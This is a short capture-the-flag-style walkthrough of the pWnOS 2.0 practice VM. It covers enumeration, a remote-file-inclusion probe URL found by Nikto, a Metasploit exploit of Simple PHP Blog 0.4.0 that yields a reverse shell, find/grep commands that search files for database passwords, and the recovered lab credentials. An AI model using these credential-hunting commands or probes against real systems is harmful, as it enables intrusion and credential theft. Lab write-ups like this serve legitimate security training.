PWNOS: 2.0 (PRE-RELEASE) Walkthrough

pWnOS v2.0 is a Virutal Machine Image which hosts a server to pratice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was design to be used with WMWare Workstation 7.0, but can also be used with most other virtual machine software.

For set-up:

Enumeration

Possibilities:

  1. Get some usernames and bruteforce though SSH.
  2. Possible CMS with vulnerability.
  3. Website with SQLi or LFI or RCE.

More Enumeration…

📌 OS: Debian Ubuntu

  1. SSH

Possible User Enumeration.

2. HTTP

  • Manual Testing (3-steps)

http://10.10.10.100/activate.php?x=test%40gmail.com&y=c0a4235e2ee6cff3a543dcfdfb6a3e2c

Seems like worth taking a deep look 🔑
  • Nikto Scan
/info.php?file=http://cirt.net/rfiinc.txt?

http://ha.ckers.org/weird/rfi-locations.dat

  • Gobuster
It’s SPHPBlog 🤔
It is Simple PHP Blog 0.4.0

10.10.10.100/blog/comments.php?y=11&m=05&entry=entry110509–191340

Finding POI (Point Of Intrusion)

The blog version is Simple PHP Blog 0.4.0

Using Metasploit…

Got the reverse shell…..

🤓

Privilege Escalation

Use the following the find PHP — MySQL pwd:

  • find / -type f -exec grep -ln “sql.connect” {} \; 2>/dev/null
  • find / -type f -exec grep -l -n “DB_PASSWORD” {} \; 2>/dev/null

Credentials:

  1. Dan:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

After decrypting,

Dan:killerbeesareflying

However, that did not work with SSH.

Let’s try root:

DEFINE (‘DB_USER’, ‘root’);
DEFINE (‘DB_PASSWORD’, ‘root@ISIntS’);

What could be more fun than breaking stuffs!!!